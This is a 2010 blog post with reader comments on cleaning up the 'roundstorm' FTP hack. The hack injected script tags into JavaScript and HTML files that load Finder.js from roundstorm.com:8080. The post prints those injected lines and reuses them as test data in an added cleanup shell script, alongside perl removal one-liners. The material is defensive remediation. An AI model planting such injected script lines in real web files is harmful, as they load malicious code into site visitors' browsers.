RoundStorm FTP Hack – Solution
This past weekend a few of my FTP accounts got hacked via a Java virus that is being spread via roundstorm.com. I posted some more info and a fix below.
-
The following code was being injected into all Javascript files found via FTP.
document.write('<s'+'cript type="text/javascript" src="http://roundstorm.com:8080/Finder.js"></scr'+'ipt>');
-
All index/home/footer & header HTML files had this code
<script type="text/javascript" src="http://roundstorm.com:8080/Finder.js"></script> <!--4561fc54d91b71ee303e54dd3da18ccf-->
-
Solution
Via shell access to your server you can run the following command:
perl -pi -w -e 's/(\n?)( ?)document.write.*ipt>.\);/ /g' `grep -ril roundstorm *`
perl -pi -w -e 's/.*roundstorm.*|.*4561fc54d91b71ee303e54dd3da18ccf.*/ /g' `grep -ril 4561fc54d91b71ee303e54dd3da18ccf *`
NOTE: Replace the unique identifier in the second command (“4561fc54d91b71ee303e54dd3da18ccf”) with whatever is found in your HTML files. That command searches all files for the unique roundstorm identifier and removes the lines containing it. This ID is different for each FTP account that has been hacked.
Together these commands find all files infected with the roundstorm hack and remove the injected code.
After you clean up the files, run a virus cleanup on your computer. I used malwarebytes. Also remember to update all your FTP PASSWORDS and DO NOT save any FTP information in your FTP client.
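As an added example that is not part of the original post, the shell functions below do the same cleanup as the two perl one-liners above, but keep a .bak copy of every file they touch, strip only the injected fragment (so legitimate code sharing a line survives, which the second perl command's whole-line replacement does not guarantee), and match the 32-hex-digit marker comment generically since the post notes it differs per hacked account. They assume POSIX sh with grep -r and sed -E; the sample tree built by make_sample_tree is constructed for testing and is not real site content.

```shell
#!/bin/sh
# Added example, not the post's own commands. Cleans the roundstorm injection
# described above from a site tree while keeping a .bak copy of every touched
# file. Assumes POSIX sh, grep -r and sed -E; the 32-hex-digit marker is matched
# generically because it differs per hacked account.

# Exact injected JS fragment (ERE, special chars escaped); only this fragment is
# removed, so legitimate code sharing the line survives.
JS_INJECT="document\.write\('<s'\+'cript type=\"text/javascript\" src=\"http://roundstorm\.com:8080/Finder\.js\"></scr'\+'ipt>'\);"
# Injected HTML tag plus its optional per-account marker comment
HTML_INJECT="<script type=\"text/javascript\" src=\"http://roundstorm\.com:8080/Finder\.js\"></script> *(<!--[0-9a-f]{32}-->)?"

# List files under $1 that reference the injected script (skipping .bak copies)
list_infected() {
    grep -rlF 'roundstorm.com:8080/Finder.js' "$1" | grep -v '\.bak$'
}

# Strip the fragments from one file; the original is preserved as FILE.bak
clean_file() {
    cp "$1" "$1.bak"
    sed -E -e "s|$JS_INJECT||g" -e "s|$HTML_INJECT||g" "$1.bak" > "$1"
}

# Clean every infected file under a directory and print how many were cleaned
clean_tree() {
    n=$(list_infected "$1" | wc -l | tr -d ' ')
    list_infected "$1" | while IFS= read -r f; do
        clean_file "$f"
    done
    echo "$n"
}

# Build a throwaway tree with constructed sample files (not real site content)
# and print its path, so the cleaner can be tried offline
make_sample_tree() {
    d=$(mktemp -d)
    mkdir -p "$d/js"
    printf '%s\n' 'var a = 1;' \
      "function f(){return 1;}document.write('<s'+'cript type=\"text/javascript\" src=\"http://roundstorm.com:8080/Finder.js\"></scr'+'ipt>');" \
      > "$d/js/app.js"
    printf '%s\n' '<html><body>' \
      '<script type="text/javascript" src="http://roundstorm.com:8080/Finder.js"></script> <!--4561fc54d91b71ee303e54dd3da18ccf-->' \
      '</body></html>' > "$d/index.html"
    printf '%s\n' 'nothing injected here' > "$d/about.html"
    echo "$d"
}

# Usage on a real site:  . ./clean_roundstorm.sh && clean_tree /path/to/site
```

Run clean_tree against a copy of the site first and diff the .bak files against the cleaned ones before touching the live tree; a second run printing 0 confirms nothing referencing the injected script is left behind.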
There is also another blogger reporting the same hack here: http://wpguru.co.uk/2010/07/the-drunkjeans-com-wordpress-hack-and-how-to-get-rid-of-it/
UPDATE: 07/21/2010
Other solutions:
- Restore a backup of the site. If you have cPanel or Plesk this should be easy.
- If your site is in a version control system you can simply revert all changed files.
- Nick, from our comments area below, suggested a PHP script would be more helpful for those users who do not have shell access. Let me know via the comments area if this is in high demand, I can probably devote some time to creating a script this week.
For any questions regarding this post contact us at http://tritonweb.com/contact.php
Leave a comment if you found this useful!



July 15th, 2010 at 11:52 am
I had the same thing on my website, it infected various different scripts and somehow even got in to replace and infect well protected files. It even got to some scripts that are not public. To me this suggests some kind of root level access.
I don’t know how this virus works or anything about its method or how to protect against it, but I have managed to check through 20,000 odd files and replace them with fresh copies from my backups. Mostly index.php’s, .js files and .html stuff.
July 15th, 2010 at 1:23 pm
Thanks for the info Mark. I also recently found that getting rid of this virus on my PC is tricky. I have installed NoScript (Firefox Plugin) and completely uninstalled Java6 from my computer… The sites I visit hardly used Java anyway.
July 19th, 2010 at 2:01 am
Did the virus get from your computer to your website or your website to your computer? The virus never got onto my computer thanks to Eset’s AV, it was on the website first.
I would love to know how it worked because if it got in once then it can sure as heck do it again and I doubt just changing my passwords will work.
But I have a lot of different systems so knowing which is vulnerable requires knowing how the script works. I have tried to contact various AV firms but they are all useless.
July 20th, 2010 at 7:54 am
Also have been ‘infected’. It added to all my index, js files as well as many html and php files with ‘main’ as the prefix.
Still very limited information on the web about it
July 20th, 2010 at 7:27 pm
Back…
As one who ‘dabbles’ in php, the thought came to me that, as the AV big boys haven’t yet taken this problem under their wings, perhaps a small group of talented individuals could write a php/asp/etc script that would run through all the files on a person’s site, automatically editing out the offending code.
I know the concept is valid; however, I do not feel I am sufficiently skilled to write it. Correcting via the shell may be a bit too daunting for the average site owner, whereas running a simple script is something easily done by even a novice.
Just a thought.
Nick
July 21st, 2010 at 9:28 am
@Nick, I thought about that too but found it easier to use shell since we have access to our servers. The only flaw I see in using a PHP script is that you’ll need to properly CHMOD all the files before running the script and maybe on shared hosts the script will not be able to run for long periods of time.
Other solutions:
- Restore a backup of the site. If you have cPanel or Plesk this should be easy.
- If your site is in a version control system you can simply revert all changed files.
I can probably whip up a PHP script if enough requests come in.
July 30th, 2010 at 5:46 pm
Thanks for the great advice.
I just helped to restore a client’s site that was infected. It’s a nasty one and as you said was in every file and directory. We did a full site restore to fix it.
But I’m curious about the details of your comment. “Delete all FTP Passwords and do not save any on your client”. Is the virus somehow grabbing passwords from the FTP Client?
I’m a Mac guy which (normally) gives me a certain level of security, and I’m using Transmit for Mac, which is a pretty decent FTP client. However my passwords are saved within Transmit. (Although they are encrypted).
I’m just wondering what kinds of hoops need to be jumped?
Thanks again!
July 31st, 2010 at 3:18 pm
Some thoughts…
Does anyone of you use phpmaker?
Does anyone have / has anyone had the mywebsearch plugin installed?
regards,
Ivan
July 31st, 2010 at 3:27 pm
Forget the cPanel option, I’ve had sites hacked on hosting servers not offering cPanel or Plesk. In my opinion the malware resides on the PC of the webmaster.
August 3rd, 2010 at 11:14 am
@David the passwords are encrypted locally but can be easily decrypted depending on the app. Check to see if your FTP client has a setting for a “Master Password.” This should increase the security of your passwords; also, if you save passwords in your browser you might want to set up a “Master Password” there too.
@Ivan I had to download and run Avast free anti-virus in Boot mode. This found several *.sys, *.tmp files that were infected. Mainly in temp and system32 folders. NoScript is really helping and uninstalling Java also didn’t hurt.